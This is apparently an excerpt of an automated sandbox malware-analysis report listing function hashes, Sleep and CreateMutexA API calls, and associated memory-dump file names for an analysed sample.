Instruction ID: 59b59e80f944fb88cc733f69e52b878a07635e01a20e9d5f4f7f009e090b1613
Opcode Fuzzy Hash: 6e3b53b00ada645f978a9499265517d2ee4bc40dba3810556496f243b9a1e811
Instruction Fuzzy Hash: 333177317842009BEB18DB7CDCC9F6DB7A6DFCA310F248618E418973D1D77A99808B52

Function 0094A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ecb8dc56155b5286953166f06ad32025804c2aa47815f02a7e368983717b65f6
Instruction ID: 7f7fe13fba4d9e67015f11752d0f0b495e5bb6e37a14a4d972eaf1cd53436fb9
Opcode Fuzzy Hash: ecb8dc56155b5286953166f06ad32025804c2aa47815f02a7e368983717b65f6
Instruction Fuzzy Hash: C33148317841419BEB18DB7CDC8DF6DB7A6EFCA310F248618E418972D1D77A99808752

Function 0094A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: eb05536e4ff977b7176d093decce86f4a1b56821d946e88160c7d0ddfe21ccb1
Instruction ID: 8258b2cd9669ff1bcb3285fa5fb03866a8e1c3a3854d0211c371b5ce12531749
Opcode Fuzzy Hash: eb05536e4ff977b7176d093decce86f4a1b56821d946e88160c7d0ddfe21ccb1
Instruction Fuzzy Hash: 57316831784100DBEB18DB7CDC8DF6DBBA6EFC6310F248618E4589B6D6D7B989808752

Function 0094A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2c49ecebd157589a7f635493764501fa83cefa6c197d64b37469e13a228fe2cb
Instruction ID: ab9be5fe85594e2fd8a814d0a838378c9899618bfd58ed243b54c87a40bcd4ba
Opcode Fuzzy Hash: 2c49ecebd157589a7f635493764501fa83cefa6c197d64b37469e13a228fe2cb
Instruction Fuzzy Hash: F33168317851018BEB18EB7CDD8DF6DB7A6EFC6314F248618F4189B2D2DB7989808712

Function 0094A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ef304a0bb000bda3710c936b29fbafc386372b1dbedc691fc9b7e84a1e567934
Instruction ID: 412f20f2cfbda6458c0589abda04422a968e028e86fb11ac170e648175663fd4
Opcode Fuzzy Hash: ef304a0bb000bda3710c936b29fbafc386372b1dbedc691fc9b7e84a1e567934
Instruction Fuzzy Hash: 5A312671B842018BEB28DB78DC89F6DB7A6DBC6310F248618E418972D1D77589808752

Function 00949ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000001.00000002.1716157140.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.1716137719.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716157140.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716208236.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716222532.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716238408.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716326053.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716341149.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
